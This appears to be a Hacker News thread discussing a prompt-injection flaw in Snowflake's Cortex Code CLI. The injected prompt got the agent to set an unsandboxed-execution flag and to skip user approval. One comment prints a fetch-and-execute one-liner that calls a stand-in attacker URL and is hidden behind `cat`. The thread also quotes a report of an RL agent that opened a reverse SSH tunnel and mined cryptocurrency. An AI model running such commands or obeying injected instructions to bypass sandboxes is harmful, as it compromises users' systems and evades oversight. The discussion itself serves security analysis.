another prompt injection (shocked pikachu)
anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.
Whether this is possible depends almost entirely on how much better we’re able to make these LLMs before (if) we hit a wall. Everyone has a different opinion on this and I absolutely don’t know the answer.
Good luck explaining the details to them. I am in a semi-privileged position where I have a direct line to a very no-BS and cheerful CEO who is not micromanaging us -- but he's a CEO and he needs results pronto anyway.
"Find a better job" would also be a very tone-deaf response for many. The current AI craze makes a lot of companies hole up and either freeze hiring (best-case scenario) or drastically reduce headcount and tell the survivors to deal with it. Again, exaggerated for effect -- but again, heard it from multiple acquaintances in some form in the last months.
I'd probably let out a few tears if I switched jobs to somewhere people genuinely care about quality and won't whip you to go faster and faster.
This current AI/LLM wave really drove it home how hugely important having a good network is. For those without (like myself) -- good luck in the jungle.
(Though in fairness, maybe money can be made from EU's long-overdue wake-up call to start investing in defenses, cyber ones included. And the need for their own cloud infra. But that requires investment and the EU investors are -- AFAIK, which is not much -- notoriously conservative and extremely risk-averse. So here we are.)
Easy fix: extend the proposal in RFC 3514 [0] to cover prompt injection, and then disallow command execution when the evil bit is 1.
I'm used to a different usage of that word: from malware analysis, a sandbox is a contained system that is difficult to impossible to break out of so that the malware can be observed safely.
Applying this to AI, I think there are many companies trying to build technical boundaries stronger than just "are you sure" prompts. Interesting space to watch.
> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]
> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.
* https://arxiv.org/abs/2512.24873
One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:
* https://www.anthropic.com/research/emergent-misalignment-rew...
> Each task runs in its own sandbox. If an agent crashes, gets stuck, or damages its files, the failure is contained within that sandbox and does not interfere with other tasks on the same machine. ROCK also restricts each sandbox’s network access with per-sandbox policies, limiting the impact of misbehaving or compromised agents.
How could any of the above (probing resources, SSH tunnels, etc) be possible in a sandbox with network egress controls?
I expected this to be about gaining os privileges.
They didn't create a sandbox. Poor security design all around
Tomato, tomawto
/s
>(1) the unsafe commands were within a process substitution <() expression
>(2) the full command started with a ‘safe’ command (details below)
if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?
So if you allow exclusively single-quoted strings as arguments, `cat` should be fine. Double quoted ones might contain env vars or process substitution, so they would need to either be blocked or checked a heck of a lot more smartly, and extremely obviously you would have to do more to check process substitution outside strings too. But a sufficiently smart check could probably allow `cat <(cat <(echo 'asdf'))` without approval... unless there's something dubious possible with display formatting / escape codes, beyond simply hiding things from display.
I would not at all consider this to be "a sandbox" though.
And obviously that doesn't work for all, e.g. `find` can run arbitrary code via `-exec`, or `sh` for an extreme example. But you can get a lot done with the safe ones too.
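To make the failure mode concrete, here is a hypothetical sketch (in bash -- process substitution is a bashism) of the kind of naive "is the first word on an allowlist" check being discussed, and why it is trivially bypassed. This is not Cortex's actual code; the function name and allowlist are made up for illustration.

```shell
# Hypothetical naive check: look only at the first word of the command.
is_safe() {
  case "${1%% *}" in
    cat|ls|echo|grep) return 0 ;;
    *)                return 1 ;;
  esac
}

benign='cat /etc/hostname'
malicious='cat < <(sh < <(echo "echo pwned"))'

is_safe "$benign"    && echo "benign allowed"
is_safe "$malicious" && echo "malicious allowed too"  # same first word: cat
```

Both commands pass, because the checker never looks past the first token to see the `sh` hiding inside the process substitution.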
I've been running Claude Code inside VS Code devcontainers. Claude's docs have a suggested setup for this which even includes locking down outgoing internet access to an approved domain list.
Unfortunately our stack doesn't really fit inside a devcontainer without docker-in-docker, so I'm only getting Claude to run unit tests for now. And integration with JJ workspaces is slightly painful.
I'm this close to trying a full VM setup with Vagrant.
People keep imagining that you can tell an agent to police itself.
Am I crazy, or does this mean it didn't really escape -- it wasn't given any scope restrictions in the first place?
>Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
>This flag is intended to allow users to manually approve legitimate commands that require network access or access to files outside the sandbox.
>With the human-in-the-loop bypass from step 4, when the agent sets the flag to request execution outside the sandbox, the command immediately runs outside the sandbox, and the user is never prompted for consent.
scope restrictions are in place but are trivial to bypass
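In pseudo-shell, the flawed pattern the quoted steps describe looks roughly like this. All names here are made up; the point is only that the routing decision depends on a value the model (and therefore an injected prompt) controls.

```shell
run_in_sandbox() { echo "sandboxed: $1"; }    # stand-in for a real sandbox

run_tool() {
  local cmd=$1 unsandboxed_flag=$2            # flag is model-controlled,
  if [ "$unsandboxed_flag" = "true" ]; then   # hence attacker-controlled
    bash -c "$cmd"                            # full access, no human prompt
  else
    run_in_sandbox "$cmd"
  fi
}

run_tool 'echo hello' false     # stays in the sandbox
run_tool 'echo escaped' true    # injected flag -> runs unsandboxed
```

With the consent prompt bypassed, setting the flag is all it takes: the "restriction" is a branch the untrusted party gets to choose.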
The whole thing should be running "sandboxed", whether that's a separate machine, a container, an unprivileged linux user, or what floats your boat.
But once you do that, which you should be anyway, what do you need sandboxing at the agent level for? That's the part I don't really understand.
Or is the point "well most people won't bother running this stuff securely, so we'll try to make it reasonably secure for them even though they're doing it wrong" ?
These were internal restrictions in the code that were bypassed. A sandbox needs to be something external to the code you are running, that you can't change from the inside.
The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary.
One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions.
Not a silver bullet, but I think that architectural distinction matters here.
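A minimal sketch of that distinction: the approval gate lives in the harness and reads the decision from the human, so nothing in the model's tool call can route around it. (Hypothetical code; for testability this reads the answer from standard input, but a real CLI would read from /dev/tty so piped or injected input can't auto-approve.)

```shell
# The harness, not the model, decides whether a command runs.
approve_and_run() {
  local cmd=$1
  printf 'Agent requests: %s\nApprove? [y/N] ' "$cmd" >&2
  local ans; read -r ans
  if [ "$ans" = "y" ]; then
    bash -c "$cmd"
  else
    echo "denied" >&2
    return 1
  fi
}
```

There is no flag the model can set to skip the `read`; the worst a prompt injection can do is ask, visibly.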
That is, assume you can get people to run your code or leak their data through manipulating them. Maybe not always, but given enough perseverance definitely sometimes.
Why should we expect a sufficiently advanced language model to behave differently from humans? Bullshitting, tricking or slyly coercing people into doing what you want them to do is as old as time. It won't be any different now that we're building human language powered thinking machines.
So giving data agents rich tooling through a CLI is really a double-edged sword.
I went through the security guidance for the Snowflake Cortex Code CLI (https://docs.snowflake.com/en/user-guide/cortex-code/securit...), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user's credentials? That would be a broader system problem around permission caching, shell auditing, and sandbox isolation.
cat < <(sh < <(wget -qO- https://ATTACKER_URL.com/bugbot))
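To see how that one-liner works, here is the same shape reproduced harmlessly in bash, with a plain `echo` standing in for the `wget` fetch of the attacker's script:

```shell
# The inner process substitution produces the attacker's script (here just
# an echo); `sh` executes it; the outer `cat` merely relays its output. By
# the time cat runs, the arbitrary code has already executed -- all under a
# command line that "starts with cat".
out=$(cat < <(sh < <(echo 'echo payload-ran')))
echo "$out"
```

So `cat` is just the camouflage that satisfies a first-word safety check; the real execution happens in the nested `sh`.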
I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
HOW did the prompt injection manipulate the model in that way?
The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.
It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.
I am a Snowflake Employee and just wanted to share (as FYI) the timeline on discovery, validation, and the fix implemented/deployed by our security team.
For those interested, here's the link to the detailed article: https://community.snowflake.com/s/article/PromptArmor-Report...
We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:
non-technical: wants to use the agent we have built into our web app
technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.
why does snowflake need its own agentic CLI?
Cortex Code is available via web and CLI. The web version is good. I've used the CLI and it is fine too, though I prefer the visuals of the web version when looking at data outputs. For writing code it is similar to Codex or Claude Code. It is more data focused than the other options, I gather, and has great hooks into your Snowflake tables. You could do similar things with Snowpark and, say, Claude Code. I find Snowflake's focus on personas is more functional than purely technical, so Cortex Code fits well with that. Though if you want to do your own thing you can use your own IDE and code agent, and then you are back to choosing between the Cortex Code CLI, Codex, Cursor, or Claude Code.
*rolls eyes* Actual content: prompt injection vulnerability discovered in a coding agent
I don't know how anyone with a modicum of Unix experience would think that examining only the first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution.